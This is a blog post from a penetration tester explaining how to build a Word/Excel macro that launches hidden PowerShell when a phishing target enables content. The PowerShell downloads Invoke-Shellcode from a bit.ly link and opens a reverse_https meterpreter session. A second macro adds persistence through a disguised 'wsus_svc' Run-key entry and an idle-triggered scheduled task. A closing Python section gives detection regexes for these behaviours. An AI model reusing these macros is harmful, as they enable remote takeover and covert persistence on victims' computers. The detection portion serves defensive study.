Saturday, May 3, 2014

Ditching Migration with the Word Macro

Intro

I've recently been experimenting with Microsoft Word macros after a co-worker of mine ran into some issues with heuristic AV and process migration during a phishing campaign. Specifically, he had to migrate his meterpreter to a new process in order for his session to stay alive when the targeted user closed the macro-embedded Word document.

I started to think, "OK, if the migration is the problem, then how can we avoid having to migrate to a new process altogether?"

Enter WshShell's Run method

Directly from the MSDN page: "The Run method starts a program running in a new Windows process."

I don't know about you, but that sounds exactly like the solution we were looking for. It will create a completely new Windows process that is not tied to the not-so-reliable process our macro-embedded Word document was running in.

The only question I had left was whether the targeted user would see anything on their end once the process is started. Further research into the MSDN page shows the following arguments:

object: WshShell object.
strCommand: String value indicating the command line you want to run. You must include any parameters you want to pass to the executable file.
intWindowStyle: Optional. Integer value indicating the appearance of the program's window. Note that not all programs make use of this information.
bWaitOnReturn: Optional. Boolean value indicating whether the script should wait for the program to finish executing before continuing to the next statement in your script. If set to true, script execution halts until the program finishes, and Run returns any error code returned by the program. If set to false (the default), the Run method returns immediately after starting the program, automatically returning 0 (not to be interpreted as an error code).

The argument intWindowStyle looked like an interesting option, and after looking further into the MSDN I discovered that passing 0 for this option hides the new process's window, so the targeted user would be none the wiser.


The Modified Macro

Using the knowledge gained above, it was time to put the plan into action. After some testing and experimentation I finally came up with the macro below, which makes use of Matt Graeber's Invoke-Shellcode:

 Sub shellexec()
   Dim wsh As Object
   ' WScript.Shell exposes the Run method described above
   Set wsh = VBA.CreateObject("WScript.Shell")
   ' intWindowStyle 0 = hidden window
   Dim windowStyle As Integer: windowStyle = 0

   ' Run returns immediately (bWaitOnReturn defaults to False),
   ' so powershell.exe lives on as a separate process
   wsh.Run "powershell.exe -Command iex(New-Object Net.WebClient).DownloadString('http://bit.ly/NHpT5c');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force", windowStyle
 End Sub
 ' Word runs AutoOpen when the document is opened
 Sub AutoOpen()
   shellexec
 End Sub
 ' Workbook_Open is the Excel workbook equivalent
 Sub Workbook_Open()
   shellexec
 End Sub

The above code will execute once the targeted user selects "Enable Content" within a Microsoft Word document. This will create a new process and use the Invoke-Shellcode PowerShell script to send a reverse_https meterpreter to the specified listener. Once run, we will have a separate, stable powershell.exe process that is unaffected by the targeted user closing the Word document, without using migration. Take that, AV!

Taking it One Step Further


With the ability to execute arbitrary Windows commands on the remote system, I began to think of different tasks that would be fun to have automated. The first thing that entered my mind was persistence. I also wanted this persistence to not add any additional binary files to the remote system. I decided that I would like an entry in the remote system's registry that would initiate a session upon the current user's login, and also a scheduled task to initiate a session for every 1 minute of user idle time.

Below is the macro that was created for this:

 Sub shellexec()
   Dim wsh As Object
   Set wsh = VBA.CreateObject("WScript.Shell")
   ' intWindowStyle 0 = hidden window for every Run call below
   Dim windowStyle As Integer: windowStyle = 0

   ' Immediate session, as in the first macro
   wsh.Run "powershell.exe -Command iex(New-Object Net.WebClient).DownloadString('http://bit.ly/NHpT5c');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force", windowStyle

   ' Persistence 1: HKCU Run key value, fires at the current user's login
   wsh.Run "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /f /t REG_SZ /v wsus_svc /d ""C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Command iex(New-Object Net.WebClient).DownloadString('http://bit.ly/NHpT5c');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force""", windowStyle

   ' Persistence 2: scheduled task, fires after 1 minute of user idle time
   wsh.Run "schtasks /create /tn wsus_svc /tr ""powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://bit.ly/NHpT5c'''))';Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 4444 -Force"" /sc onidle /i 1", windowStyle
 End Sub
 Sub AutoOpen()
   shellexec
 End Sub
 Sub Workbook_Open()
   shellexec
 End Sub


Now, once your targeted user enables the mysterious content of a downloaded Word document, you will automatically have persistence established faster than you can type sessions -i 1.
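Everything the two macros above do leaves a process-creation and registry trail on the endpoint: an Office process spawning powershell.exe with a download cradle, reg.exe writing an HKCU Run value, and schtasks.exe creating an onidle task. The following detection logic is an added example (not part of the original post) that runs those checks over a handful of constructed Sysmon-style events; the event shape, field names, paths and URL are all made up for the example.

```python
import re

# Constructed sample events in a Sysmon-like shape (not real telemetry).
# id 1 = process creation, id 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command iex(New-Object Net.WebClient).DownloadString('http://example.invalid/p')"},
    {"id": 1, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ /f /t REG_SZ /v wsus_svc /d "powershell.exe -WindowStyle hidden -NoLogo -Command iex(...)"'},
    {"id": 1, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn wsus_svc /tr "powershell.exe -WindowStyle hidden -ep bypass -nop -c IEX(...)" /sc onidle /i 1'},
    {"id": 13, "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Run\wsus_svc",
     "details": "powershell.exe -WindowStyle hidden -NoLogo -Command iex(...)"},
    # benign: an admin script launched from the desktop, no cradle flags
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
SHELL_CHILDREN = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
# Tokens that appear in the macros' command lines: download cradle and hidden/bypass flags
CRADLE_RE = re.compile(r"downloadstring|\biex\b|invoke-expression|-ep bypass|-windowstyle hidden", re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the list of alert labels for one event (empty if nothing matched)."""
    alerts = []
    if ev["id"] == 1:
        parent, child, cmd = basename(ev.get("parent", "")), basename(ev["image"]), ev["cmdline"]
        if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
            alerts.append("office_spawned_shell")          # WshShell.Run from a macro
        if child == "powershell.exe" and CRADLE_RE.search(cmd):
            alerts.append("powershell_download_cradle")     # Invoke-Shellcode fetch
        if child == "reg.exe" and RUN_KEY_RE.search(cmd) and CRADLE_RE.search(cmd):
            alerts.append("run_key_persistence_via_reg")    # REG ADD ...\Run
        if child == "schtasks.exe" and "/create" in cmd.lower() and CRADLE_RE.search(cmd):
            alerts.append("scheduled_task_persistence")     # schtasks /sc onidle
    elif ev["id"] == 13 and RUN_KEY_RE.search(ev["target"]) and CRADLE_RE.search(ev["details"]):
        alerts.append("run_key_value_set")                  # registry telemetry view of the same write
    return alerts

def scan(events):
    """Map event index -> alerts for every event that raised at least one."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}
```

The Run-key and schtasks checks match on the persistence command lines regardless of which parent launched them, so they also cover the case where the macro's hidden powershell.exe, rather than Word itself, does the writing.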

Links:

MSDN WshShell: http://msdn.microsoft.com/en-us/library/d5fk67ky(v=vs.84).aspx
PowerSploit: https://github.com/mattifestation/PowerSploit